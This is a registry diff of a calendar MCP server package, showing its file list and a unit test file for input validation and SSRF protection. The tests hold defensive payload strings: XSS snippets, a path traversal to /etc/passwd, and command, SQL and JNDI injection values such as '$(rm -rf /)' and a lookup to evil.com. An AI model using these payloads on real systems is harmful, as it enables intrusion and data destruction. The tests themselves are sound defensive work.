iflow_mcp_democratize_technology_chronos_mcp-2.0.0-py3-none-any.whl
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- chronos_mcp/__init__.py +5 -0
- chronos_mcp/__main__.py +9 -0
- chronos_mcp/accounts.py +410 -0
- chronos_mcp/bulk.py +946 -0
- chronos_mcp/caldav_utils.py +149 -0
- chronos_mcp/calendars.py +204 -0
- chronos_mcp/config.py +187 -0
- chronos_mcp/credentials.py +190 -0
- chronos_mcp/events.py +515 -0
- chronos_mcp/exceptions.py +477 -0
- chronos_mcp/journals.py +477 -0
- chronos_mcp/logging_config.py +23 -0
- chronos_mcp/models.py +202 -0
- chronos_mcp/py.typed +0 -0
- chronos_mcp/rrule.py +259 -0
- chronos_mcp/search.py +315 -0
- chronos_mcp/server.py +121 -0
- chronos_mcp/tasks.py +518 -0
- chronos_mcp/tools/__init__.py +29 -0
- chronos_mcp/tools/accounts.py +151 -0
- chronos_mcp/tools/base.py +59 -0
- chronos_mcp/tools/bulk.py +557 -0
- chronos_mcp/tools/calendars.py +142 -0
- chronos_mcp/tools/events.py +698 -0
- chronos_mcp/tools/journals.py +310 -0
- chronos_mcp/tools/tasks.py +414 -0
- chronos_mcp/utils.py +163 -0
- chronos_mcp/validation.py +636 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/METADATA +299 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/RECORD +68 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/WHEEL +5 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/entry_points.txt +2 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/licenses/LICENSE +21 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/top_level.txt +2 -0
- tests/__init__.py +0 -0
- tests/conftest.py +91 -0
- tests/unit/__init__.py +0 -0
- tests/unit/test_accounts.py +380 -0
- tests/unit/test_accounts_ssrf.py +134 -0
- tests/unit/test_base.py +135 -0
- tests/unit/test_bulk.py +380 -0
- tests/unit/test_bulk_create.py +408 -0
- tests/unit/test_bulk_delete.py +341 -0
- tests/unit/test_bulk_resource_limits.py +74 -0
- tests/unit/test_caldav_utils.py +300 -0
- tests/unit/test_calendars.py +286 -0
- tests/unit/test_config.py +111 -0
- tests/unit/test_config_validation.py +128 -0
- tests/unit/test_credentials_security.py +189 -0
- tests/unit/test_cryptography_security.py +178 -0
- tests/unit/test_events.py +536 -0
- tests/unit/test_exceptions.py +58 -0
- tests/unit/test_journals.py +1097 -0
- tests/unit/test_models.py +95 -0
- tests/unit/test_race_conditions.py +202 -0
- tests/unit/test_recurring_events.py +156 -0
- tests/unit/test_rrule.py +217 -0
- tests/unit/test_search.py +372 -0
- tests/unit/test_search_advanced.py +333 -0
- tests/unit/test_server_input_validation.py +219 -0
- tests/unit/test_ssrf_protection.py +505 -0
- tests/unit/test_tasks.py +918 -0
- tests/unit/test_thread_safety.py +301 -0
- tests/unit/test_tools_journals.py +617 -0
- tests/unit/test_tools_tasks.py +968 -0
- tests/unit/test_url_validation_security.py +234 -0
- tests/unit/test_utils.py +180 -0
- tests/unit/test_validation.py +983 -0
tests/unit/test_validation.py
@@ -0,0 +1,983 @@
+"""
+Unit tests for input validation
+"""
+
+from datetime import datetime
+import ipaddress
+import socket
+from unittest.mock import patch
+
+import pytest
+
+from chronos_mcp.exceptions import ValidationError
+from chronos_mcp.models import TaskStatus
+from chronos_mcp.validation import InputValidator
+
+
+class TestTextFieldValidation:
+    def test_validate_text_field_success(self):
+        """Test successful text field validation"""
+        result = InputValidator.validate_text_field("Test Event", "summary")
+        assert result == "Test Event"
+
+        # Test with HTML entities (should NOT be escaped at storage layer)
+        result = InputValidator.validate_text_field("Meeting & Discussion", "summary")
+        assert result == "Meeting & Discussion"  # No escaping at storage
+
+    def test_validate_text_field_required(self):
+        """Test required field validation"""
+        # Required field with empty value
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_text_field("", "summary", required=True)
+        assert "summary is required" in str(exc_info.value)
+
+        # Optional field with empty value
+        result = InputValidator.validate_text_field("", "description", required=False)
+        assert result == ""
+
+    def test_validate_text_field_length(self):
+        """Test field length validation"""
+        # Exceed max length
+        long_text = "A" * 300
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_text_field(long_text, "summary")
+        assert "exceeds maximum length" in str(exc_info.value)
+
+    def test_dangerous_patterns_detection(self):
+        """Test detection of dangerous patterns"""
+        dangerous_inputs = [
+            "<script>alert('xss')</script>",
+            "<a href='javascript:void(0)'>",
+            "<div onclick='bad()'>",
+            "<script src='bad.js'></script>",
+            "<iframe src='evil.com'>",
+            "<object data='bad'>",
+            "<embed code='evil'>",
+        ]
+
+        for dangerous_input in dangerous_inputs:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_text_field(dangerous_input, "description")
+            assert "potentially dangerous content" in str(exc_info.value)
+
+    def test_unicode_normalization(self):
+        """Test Unicode normalization"""
+        # Unicode with different representations
+        text_nfc = "café"  # NFC form
+        text_nfd = "café"  # NFD form (e + combining acute)
+
+        result1 = InputValidator.validate_text_field(text_nfc, "summary")
+        result2 = InputValidator.validate_text_field(text_nfd, "summary")
+
+        # Both should normalize to the same form
+        assert result1 == result2
+
+
+class TestDateTimeValidation:
+    def test_validate_datetime_success(self):
+        """Test successful datetime validation"""
+        # Already a datetime object
+        dt = datetime.now()
+        result = InputValidator.validate_datetime(dt, "dtstart")
+        assert result == dt
+
+        # ISO format string
+        iso_str = "2025-07-10T10:00:00"
+        result = InputValidator.validate_datetime(iso_str, "dtstart")
+        assert isinstance(result, datetime)
+
+        # ISO format with Z suffix
+        iso_z = "2025-07-10T10:00:00Z"
+        result = InputValidator.validate_datetime(iso_z, "dtstart")
+        assert isinstance(result, datetime)
+
+    def test_validate_datetime_failure(self):
+        """Test datetime validation failures"""
+        # Invalid format
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_datetime("not a date", "dtstart")
+        assert "Invalid datetime format" in str(exc_info.value)
+
+        # Wrong type
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_datetime(12345, "dtstart")
+        assert "must be a datetime or ISO format string" in str(exc_info.value)
+
+
+class TestUIDValidation:
+    def test_validate_uid_success(self):
+        """Test successful UID validation"""
+        valid_uids = [
+            "event-123",
+            "abc_def",
+            "test.uid",
+            "user@example.com",
+            "UID-2025-07-10",
+        ]
+
+        for uid in valid_uids:
+            result = InputValidator.validate_uid(uid)
+            assert result == uid
+
+    def test_validate_uid_failure(self):
+        """Test UID validation failures"""
+        # Empty UID
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_uid("")
+        assert "UID cannot be empty" in str(exc_info.value)
+
+        # Invalid characters
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_uid("uid with spaces")
+        assert "invalid characters" in str(exc_info.value)
+
+        # Path traversal attempt
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_uid("../../../etc/passwd")
+        # This will fail the regex check first, not the path check
+        assert "invalid characters" in str(exc_info.value)
+
+        # Too long
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_uid("a" * 300)
+        assert "exceeds maximum length" in str(exc_info.value)
+
+
+class TestEmailValidation:
+    def test_validate_email_success(self):
+        """Test successful email validation"""
+        valid_emails = [
+            "user@example.com",
+            "test.user@domain.co.uk",
+            "name+tag@example.org",
+            "admin123@test-domain.com",
+        ]
+
+        for email in valid_emails:
+            result = InputValidator.validate_email(email)
+            assert result == email.lower()  # Should be lowercased
+
+    def test_validate_email_failure(self):
+        """Test email validation failures"""
+        invalid_emails = [
+            "not-an-email",
+            "@example.com",
+            "user@",
+            "user@@example.com",
+            "user@.com",
+            "a" * 250 + "@example.com",  # Too long
+        ]
+
+        for email in invalid_emails:
+            with pytest.raises(ValidationError):
+                InputValidator.validate_email(email)
+
+
+class TestEventValidation:
+    def test_validate_event_success(self):
+        """Test successful event validation"""
+        event_data = {
+            "summary": "Team Meeting",
+            "dtstart": "2025-07-10T10:00:00",
+            "dtend": "2025-07-10T11:00:00",
+            "description": "Weekly sync",
+            "location": "Conference Room",
+        }
+
+        result = InputValidator.validate_event(event_data)
+
+        assert result["summary"] == "Team Meeting"
+        assert isinstance(result["dtstart"], datetime)
+        assert isinstance(result["dtend"], datetime)
+        assert result["description"] == "Weekly sync"
+        assert result["location"] == "Conference Room"
+
+    def test_validate_event_missing_required(self):
+        """Test event validation with missing required fields"""
+        # Missing summary
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_event(
+                {"dtstart": "2025-07-10T10:00:00", "dtend": "2025-07-10T11:00:00"}
+            )
+        assert "summary is required" in str(exc_info.value)
+
+        # Missing dates
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_event({"summary": "Test"})
+        assert "start time is required" in str(exc_info.value)
+
+    def test_validate_event_date_logic(self):
+        """Test event date validation logic"""
+        # End before start
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_event(
+                {
+                    "summary": "Test",
+                    "dtstart": "2025-07-10T11:00:00",
+                    "dtend": "2025-07-10T10:00:00",
+                }
+            )
+        assert "end time must be after start time" in str(exc_info.value)
+
+
+class TestAttendeeValidation:
+    def test_validate_attendees_success(self):
+        """Test successful attendee validation"""
+        attendees = [
+            {
+                "email": "user1@example.com",
+                "name": "User One",
+                "role": "REQ-PARTICIPANT",
+                "status": "ACCEPTED",
+                "rsvp": True,
+            },
+            {"email": "user2@example.com"},  # Minimal attendee
+        ]
+
+        result = InputValidator.validate_attendees(attendees)
+
+        assert len(result) == 2
+        assert result[0]["email"] == "user1@example.com"
+        assert result[0]["role"] == "REQ-PARTICIPANT"
+        assert result[1]["email"] == "user2@example.com"
+
+    def test_validate_attendees_failure(self):
+        """Test attendee validation failures"""
+        # Not a list
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_attendees("not a list")
+        assert "must be a list" in str(exc_info.value)
+
+        # Missing email
+        with pytest.raises(ValidationError):
+            InputValidator.validate_attendees([{"name": "No Email"}])
+
+        # Invalid role
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_attendees(
+                [{"email": "test@example.com", "role": "INVALID-ROLE"}]
+            )
+        assert "Invalid attendee role" in str(exc_info.value)
+
+
+class TestRRULEValidation:
+    def test_validate_rrule_success(self):
+        """Test successful RRULE validation"""
+        valid_rules = [
+            "FREQ=DAILY",
+            "FREQ=WEEKLY;BYDAY=MO,WE,FR",
+            "FREQ=MONTHLY;BYMONTHDAY=15",
+            "FREQ=YEARLY;BYMONTH=12;BYMONTHDAY=25",
+        ]
+
+        for rule in valid_rules:
+            result = InputValidator.validate_rrule(rule)
+            assert result == rule.upper()
+
+    def test_validate_rrule_failure(self):
+        """Test RRULE validation failures"""
+        # Must start with FREQ
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_rrule("BYDAY=MO")
+        assert "must start with FREQ=" in str(exc_info.value)
+
+        # Invalid frequency
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_rrule("FREQ=HOURLY")
+        assert "Invalid frequency" in str(exc_info.value)
+
+        # Too long
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_rrule("FREQ=DAILY;" + "X=Y;" * 200)
+        assert "too complex" in str(exc_info.value)
+
+
+class TestTaskValidation:
+    """Test task validation functionality"""
+
+    def test_validate_task_success(self):
+        """Test successful task validation"""
+        task_data = {
+            "summary": "Complete project",
+            "description": "Finish the validation improvements",
+            "due": "2025-12-31T23:59:59",
+            "priority": 5,
+            "status": "NEEDS-ACTION",
+            "percent_complete": 25,
+            "uid": "task-123",
+            "related_to": ["parent-task-456"],
+        }
+
+        result = InputValidator.validate_task(task_data)
+
+        assert result["summary"] == "Complete project"
+        assert result["description"] == "Finish the validation improvements"
+        assert isinstance(result["due"], datetime)
+        assert result["priority"] == 5
+        assert result["status"] == TaskStatus.NEEDS_ACTION
+        assert result["percent_complete"] == 25
+        assert result["uid"] == "task-123"
+        assert result["related_to"] == ["parent-task-456"]
+
+    def test_validate_task_minimal(self):
+        """Test task validation with only required fields"""
+        task_data = {"summary": "Simple task"}
+
+        result = InputValidator.validate_task(task_data)
+        assert result["summary"] == "Simple task"
+        assert len(result) == 1  # Only summary should be present
+
+    def test_validate_task_missing_summary(self):
+        """Test task validation with missing summary"""
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_task({})
+        assert "summary is required" in str(exc_info.value)
+
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_task({"summary": ""})
+        assert "summary is required" in str(exc_info.value)
+
+    def test_validate_task_optional_fields_none(self):
+        """Test task validation with None values for optional fields"""
+        task_data = {
+            "summary": "Task with nulls",
+            "due": None,
+            "priority": None,
+            "status": None,
+            "percent_complete": None,
+        }
+
+        result = InputValidator.validate_task(task_data)
+        assert result["summary"] == "Task with nulls"
+        # None values should not be included in result
+        assert "due" not in result
+        assert "priority" not in result
+        assert "status" not in result
+        assert "percent_complete" not in result
+
+
+class TestPriorityValidation:
+    """Test priority validation"""
+
+    def test_validate_priority_success(self):
+        """Test valid priority values (1-9)"""
+        for priority in range(1, 10):
+            result = InputValidator.validate_priority(priority)
+            assert result == priority
+
+        # Test string numbers
+        result = InputValidator.validate_priority("5")
+        assert result == 5
+
+    def test_validate_priority_boundary_failures(self):
+        """Test priority validation boundary conditions"""
+        # Below minimum
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_priority(0)
+        assert "between 1-9" in str(exc_info.value)
+
+        # Above maximum
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_priority(10)
+        assert "between 1-9" in str(exc_info.value)
+
+        # Negative values
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_priority(-1)
+        assert "between 1-9" in str(exc_info.value)
+
+    def test_validate_priority_type_errors(self):
+        """Test priority validation with invalid types"""
+        invalid_priorities = ["not-a-number", None, [], {}, "1.5"]
+
+        for invalid in invalid_priorities:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_priority(invalid)
+            assert "must be an integer" in str(exc_info.value)
+
+        # Test float separately - int(3.14) succeeds but gives wrong value
+        # This tests that float conversion works, which is Python's default behavior
+        result = InputValidator.validate_priority(3.14)
+        assert result == 3  # float gets truncated to int
+
+
+class TestTaskStatusValidation:
+    """Test task status validation"""
+
+    def test_validate_task_status_success(self):
+        """Test valid task status values"""
+        valid_statuses = [
+            TaskStatus.NEEDS_ACTION,
+            TaskStatus.IN_PROCESS,
+            TaskStatus.COMPLETED,
+            TaskStatus.CANCELLED,
+        ]
+
+        for status in valid_statuses:
+            result = InputValidator.validate_task_status(status)
+            assert result == status
+
+        # Test string values
+        result = InputValidator.validate_task_status("NEEDS-ACTION")
+        assert result == TaskStatus.NEEDS_ACTION
+
+        result = InputValidator.validate_task_status("COMPLETED")
+        assert result == TaskStatus.COMPLETED
+
+    def test_validate_task_status_failure(self):
+        """Test task status validation failures"""
+        invalid_statuses = [
+            "INVALID-STATUS",
+            "needs-action",  # Wrong case
+            "PENDING",
+            "ACTIVE",
+            123,
+            None,
+        ]
+
+        for invalid in invalid_statuses:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_task_status(invalid)
+            assert "Invalid task status" in str(exc_info.value)
+
+
+class TestPercentCompleteValidation:
+    """Test percent complete validation"""
+
+    def test_validate_percent_complete_success(self):
+        """Test valid percent complete values (0-100)"""
+        for percent in range(0, 101):
+            result = InputValidator.validate_percent_complete(percent)
+            assert result == percent
+
+        # Test string numbers
+        result = InputValidator.validate_percent_complete("50")
+        assert result == 50
+
+        result = InputValidator.validate_percent_complete("0")
+        assert result == 0
+
+        result = InputValidator.validate_percent_complete("100")
+        assert result == 100
+
+    def test_validate_percent_complete_boundary_failures(self):
+        """Test percent complete boundary conditions"""
+        # Below minimum
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_percent_complete(-1)
+        assert "between 0-100" in str(exc_info.value)
+
+        # Above maximum
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_percent_complete(101)
+        assert "between 0-100" in str(exc_info.value)
+
+        # Large values
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_percent_complete(999)
+        assert "between 0-100" in str(exc_info.value)
+
+    def test_validate_percent_complete_type_errors(self):
+        """Test percent complete validation with invalid types"""
+        invalid_percents = ["not-a-number", None, [], {}, "50.5"]
+
+        for invalid in invalid_percents:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_percent_complete(invalid)
+            assert "must be an integer" in str(exc_info.value)
+
+        # Test float separately - int(3.14) succeeds but truncates
+        result = InputValidator.validate_percent_complete(75.8)
+        assert result == 75  # float gets truncated to int
+
+
+class TestJournalValidation:
+    """Test journal validation functionality"""
+
+    def test_validate_journal_success(self):
+        """Test successful journal validation"""
+        journal_data = {
+            "summary": "Meeting notes",
+            "description": "Discussed project timeline and deliverables",
+            "dtstart": "2025-07-10T14:30:00",
+            "categories": ["work", "meeting", "project"],
+            "uid": "journal-789",
+            "related_to": ["event-123", "task-456"],
+        }
+
+        result = InputValidator.validate_journal(journal_data)
+
+        assert result["summary"] == "Meeting notes"
+        assert result["description"] == "Discussed project timeline and deliverables"
+        assert isinstance(result["dtstart"], datetime)
+        assert result["categories"] == ["work", "meeting", "project"]
+        assert result["uid"] == "journal-789"
+        assert result["related_to"] == ["event-123", "task-456"]
+
+    def test_validate_journal_minimal(self):
+        """Test journal validation with only required fields"""
+        journal_data = {"summary": "Simple note"}
+
+        result = InputValidator.validate_journal(journal_data)
+        assert result["summary"] == "Simple note"
+        assert len(result) == 1
+
+    def test_validate_journal_missing_summary(self):
+        """Test journal validation with missing summary"""
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_journal({})
+        assert "summary is required" in str(exc_info.value)
+
+    def test_validate_journal_optional_fields_none(self):
+        """Test journal validation with None values"""
+        journal_data = {"summary": "Journal with nulls", "dtstart": None}
+
+        result = InputValidator.validate_journal(journal_data)
+        assert result["summary"] == "Journal with nulls"
+        assert "dtstart" not in result
+
+
+class TestCategoriesValidation:
+    """Test categories validation"""
+
+    def test_validate_categories_success(self):
+        """Test successful categories validation"""
+        # List of categories
+        categories = ["work", "meeting", "important"]
+        result = InputValidator.validate_categories(categories)
+        assert result == categories
+
+        # Single category as string
+        result = InputValidator.validate_categories("personal")
+        assert result == ["personal"]
+
+        # Empty list
+        result = InputValidator.validate_categories([])
+        assert result == []
+
+    def test_validate_categories_filtering(self):
+        """Test categories validation with empty strings"""
+        categories = ["work", "", "meeting", " ", "project"]
+        result = InputValidator.validate_categories(categories)
+        # Empty and whitespace-only categories should be filtered out
+        assert "work" in result
+        assert "meeting" in result
+        assert "project" in result
+        assert "" not in result
+        assert " " not in result
+
+    def test_validate_categories_failure(self):
+        """Test categories validation failures"""
+        # Invalid types
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_categories(123)
+        assert "must be a list or string" in str(exc_info.value)
+
+        # Non-string items in list
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_categories(["work", 123, "meeting"])
+        assert "must be a string" in str(exc_info.value)
+
+    def test_validate_categories_dangerous_content(self):
+        """Test categories validation with dangerous content"""
+        dangerous_categories = [
+            "<script>alert('xss')</script>",
+            "javascript:void(0)",
+            "work<iframe>evil</iframe>",
+        ]
+
+        for dangerous in dangerous_categories:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_categories([dangerous])
+            assert "potentially dangerous content" in str(exc_info.value)
+
+
+class TestRelatedToValidation:
+    """Test RELATED-TO validation"""
+
+    def test_validate_related_to_success(self):
+        """Test successful RELATED-TO validation"""
+        # List of UIDs
+        uids = ["task-123", "event-456", "journal-789"]
+        result = InputValidator.validate_related_to(uids)
+        assert result == uids
+
+        # Single UID as string
+        result = InputValidator.validate_related_to("single-uid")
+        assert result == ["single-uid"]
+
+        # Empty list
+        result = InputValidator.validate_related_to([])
+        assert result == []
+
+    def test_validate_related_to_failure(self):
+        """Test RELATED-TO validation failures"""
+        # Invalid types
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_related_to(123)
+        assert "must be a list or string" in str(exc_info.value)
+
+        # Non-string items in list
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_related_to(["valid-uid", 123])
+        assert "must be a string" in str(exc_info.value)
+
+        # Invalid UID format
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_related_to(["invalid uid with spaces"])
+        assert "invalid characters" in str(exc_info.value)
+
+
+class TestURLValidation:
+    """Test URL validation with SSRF protection"""
+
+    def test_validate_url_success(self):
+        """Test successful URL validation"""
+        valid_urls = [
+            "https://example.com",
+            "https://calendar.example.org/cal",
+            "https://test-server.co.uk:8443/calendar",
+            "https://sub.domain.example.com/path/to/calendar",
+        ]
+
+        for url in valid_urls:
+            # Mock DNS resolution to return a public IP
+            with patch("socket.getaddrinfo") as mock_dns:
+                mock_dns.return_value = [("", "", "", "", ("8.8.8.8", 0))]
+                result = InputValidator.validate_url(url)
+                assert result == url
+
+    def test_validate_url_with_private_ips_allowed(self):
+        """Test URL validation with private IPs explicitly allowed"""
+        private_urls = [
+            "https://localhost:8080/cal",
+            "https://192.168.1.100/calendar",
+            "https://10.0.0.5:9000/cal",
+        ]
+
+        for url in private_urls:
+            result = InputValidator.validate_url(url, allow_private_ips=True)
+            assert result == url
+
+    def test_validate_url_format_failures(self):
+        """Test URL format validation failures"""
+        invalid_urls = [
+            "",  # Empty
+            "http://example.com",  # HTTP not allowed
+            "ftp://example.com",  # Wrong protocol
+            "not-a-url",
+            "javascript:alert('xss')",
+            "https://",  # Missing domain
+            "https://" + "a" * 2050,  # Too long
+        ]
+
+        for invalid_url in invalid_urls:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_url(invalid_url)
+            error_msg = str(exc_info.value)
+            assert any(
+                phrase in error_msg
+                for phrase in [
+                    "cannot be empty",
+                    "Invalid URL format",
+                    "exceeds maximum length",
+                ]
+            )
+
+    def test_validate_url_ssrf_protection_blocked_hostnames(self):
+        """Test SSRF protection blocks dangerous hostnames"""
+        blocked_urls = [
+            "https://localhost/calendar",
+            "https://localhost.localdomain/cal",
+            "https://127.0.0.1:8080/calendar",
+            "https://0.0.0.0/cal",
+        ]
+
+        for blocked_url in blocked_urls:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_url(blocked_url)
+            assert "localhost and loopback addresses are not allowed" in str(
+                exc_info.value
+            )
+
+    @patch("socket.getaddrinfo")
+    def test_validate_url_ssrf_protection_private_ip_resolution(self, mock_dns):
+        """Test SSRF protection blocks URLs resolving to private IPs"""
+        private_ips = [
+            ("10.0.0.1", 0),  # Class A private
+            ("172.16.0.1", 0),  # Class B private
+            ("192.168.1.1", 0),  # Class C private
+            ("127.0.0.1", 0),  # Loopback
+            ("169.254.1.1", 0),  # Link-local
+        ]
+
+        for ip, port in private_ips:
+            mock_dns.return_value = [("", "", "", "", (ip, port))]
+
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_url("https://external-domain.com")
+
+            error_msg = str(exc_info.value)
+            assert any(
+                phrase in error_msg
+                for phrase in [
+                    "resolves to a private or internal IP",
+                    "resolves to a restricted IP address",
+                ]
+            )
+
+    @patch("socket.getaddrinfo")
+    def test_validate_url_dns_resolution_failure(self, mock_dns):
+        """Test URL validation with DNS resolution failures"""
+        # Simulate DNS resolution failure
+        mock_dns.side_effect = socket.gaierror("Name resolution failed")
+
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_url("https://non-existent-domain.example")
+
+        assert "Unable to resolve hostname" in str(exc_info.value)
+
+    def test_validate_url_malformed_hostname(self):
+        """Test URL validation with malformed hostnames"""
+        malformed_urls = [
+            "https://./calendar",
+            "https://../calendar",
+            "https://example..com/cal",
+        ]
+
+        for url in malformed_urls:
+            with pytest.raises(ValidationError):
+                InputValidator.validate_url(url)
+
+
+class TestPrivateIPCheck:
+    """Test private IP address checking utility"""
+
+    def test_is_private_ip_private_ranges(self):
+        """Test detection of private IP ranges"""
+        private_ips = [
+            "10.0.0.1",  # Class A private
+            "172.16.0.1",  # Class B private
+            "192.168.1.1",  # Class C private
+            "127.0.0.1",  # Loopback
+            "169.254.1.1",  # Link-local
+            "::1",  # IPv6 loopback
+            "fe80::1",  # IPv6 link-local
+            "fc00::1",  # IPv6 private
+        ]
+
+        for ip in private_ips:
+            assert InputValidator.is_private_ip(ip) is True
+
+    def test_is_private_ip_public_ranges(self):
+        """Test detection of public IP ranges"""
+        public_ips = [
+            "8.8.8.8",  # Google DNS
+            "1.1.1.1",  # Cloudflare DNS
+            "208.67.222.222",  # OpenDNS
+        ]
+
+        for ip in public_ips:
+            assert InputValidator.is_private_ip(ip) is False
+
+        # Note: 203.0.113.1 is actually in TEST-NET-3 range and considered private
+        # 2001:db8::1 is IPv6 documentation range and also considered private
+
+    def test_is_private_ip_invalid_format(self):
+        """Test private IP check with invalid IP formats"""
+        invalid_ips = [
+            "not-an-ip",
+            "999.999.999.999",
+            "192.168.1",  # Incomplete
+            "",
+            "192.168.1.1.1",  # Too many octets
+        ]
+
+        for invalid_ip in invalid_ips:
+            # Invalid IPs should be considered suspicious (return True)
+            assert InputValidator.is_private_ip(invalid_ip) is True
+
+
+class TestSecurityEdgeCases:
+    """Test enhanced security edge cases and encoding bypasses"""
+
+    def test_dangerous_patterns_encoding_bypasses(self):
+        """Test detection of encoded dangerous patterns"""
+        # URL encoded patterns
+        encoded_dangerous = [
+            "<script>alert('xss')</script>",  # Already tested, but important
+            "%3Cscript%3Ealert('xss')%3C/script%3E",  # URL encoded
+            "<script>alert('xss')</script>",  # HTML entities
+            "\\u003cscript\\u003ealert('xss')\\u003c/script\\u003e",  # Unicode escapes
+        ]
+
+        for dangerous in encoded_dangerous:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_text_field(dangerous, "description")
+            assert "potentially dangerous content" in str(exc_info.value)
+
+    def test_extremely_long_input_protection(self):
+        """Test protection against extremely long inputs (ReDoS protection)"""
+        # Test the pre-filter protection
+        extremely_long = "A" * (InputValidator.MAX_VALIDATION_LENGTH + 1)
+
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_text_field(extremely_long, "description")
+        assert "exceeds maximum validation length" in str(exc_info.value)
+
+    def test_malformed_datetime_edge_cases(self):
+        """Test malformed datetime scenarios that could cause issues"""
+        malformed_dates = [
+            "not-a-date-at-all",
+            "2025/07/10 10:00:00",  # Wrong separator
+            "10:00:00",  # Missing date
+            "2025-07-10T",  # Incomplete
+        ]
+
+        for malformed in malformed_dates:
+            with pytest.raises(ValidationError) as exc_info:
+                InputValidator.validate_datetime(malformed, "dtstart")
+            assert "Invalid datetime format" in str(exc_info.value)
+
+        # Some dates that look invalid but Python accepts with fromisoformat
+        # These are edge cases but Python handles them
+        accepted_dates = [
+            "2025-07-10",  # Missing time - Python accepts this
+            "2025-07-10T10:00",  # Missing seconds - Python accepts this
+        ]
+        for date_str in accepted_dates:
+            # These should work without raising an error
+            result = InputValidator.validate_datetime(date_str, "dtstart")
+            assert isinstance(result, datetime)
+
+    def test_injection_attempts_in_various_fields(self):
+        """Test SQL/command injection attempts in various fields"""
+        # Focus on control characters which are reliably caught
+        control_char_injections = [
+            "\x00\x01\x02",  # Null bytes and control chars
+            "\x1f\x7f",  # More control chars
+        ]
+
+        for injection in control_char_injections:
+            # Test in different field types
+            with pytest.raises(ValidationError):
+                InputValidator.validate_text_field(injection, "summary")
+
+        # Test UID-specific injections (these fail UID pattern matching)
+        uid_injections = [
+            "'; DROP TABLE events; --",  # Contains semicolon and spaces
+            "$(rm -rf /)",  # Contains special chars
+            "`whoami`",  # Contains backticks
+            "${jndi:ldap://evil.com/a}",  # Contains special chars
+        ]
+
+        for injection in uid_injections:
+            with pytest.raises(ValidationError):
+                InputValidator.validate_uid(injection)
+
+        # Test categories with dangerous HTML/script patterns
+        script_injections = [
+            "<script>alert('xss')</script>",
+            "javascript:void(0)",
+        ]
+
+        for injection in script_injections:
+            with pytest.raises(ValidationError):
+                InputValidator.validate_categories([injection])
+
+    def test_unicode_normalization_security(self):
+        """Test Unicode normalization doesn't introduce security issues"""
+        # Test that normalization doesn't create dangerous patterns
+        tricky_unicode = "\\u003cscript\\u003e"  # Unicode for <script>
+
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_text_field(tricky_unicode, "description")
+        assert "potentially dangerous content" in str(exc_info.value)
+
+    def test_field_length_boundaries(self):
+        """Test field length validation at exact boundaries"""
+        # Test summary at exact limit
+        max_summary = "A" * InputValidator.MAX_LENGTHS["summary"]
+        result = InputValidator.validate_text_field(max_summary, "summary")
+        assert len(result) == InputValidator.MAX_LENGTHS["summary"]
+
+        # Test one character over limit
+        over_limit_summary = "A" * (InputValidator.MAX_LENGTHS["summary"] + 1)
+        with pytest.raises(ValidationError) as exc_info:
+            InputValidator.validate_text_field(over_limit_summary, "summary")
+        assert "exceeds maximum length" in str(exc_info.value)
+
+
+class TestMalformedDataScenarios:
+    """Test scenarios with malformed data that could corrupt CalDAV servers"""
+
+    def test_malformed_event_data_combinations(self):
+        """Test malformed event data that could cause server issues"""
+        malformed_events = [
+            # Dates in wrong order (this is already tested but critical)
+            {
+                "summary": "Bad Event",
+                "dtstart": "2025-07-10T11:00:00",
+                "dtend": "2025-07-10T10:00:00",  # End before start
+            },
+            # Missing critical fields
+            {"description": "Event without summary or dates"},
+        ]
+
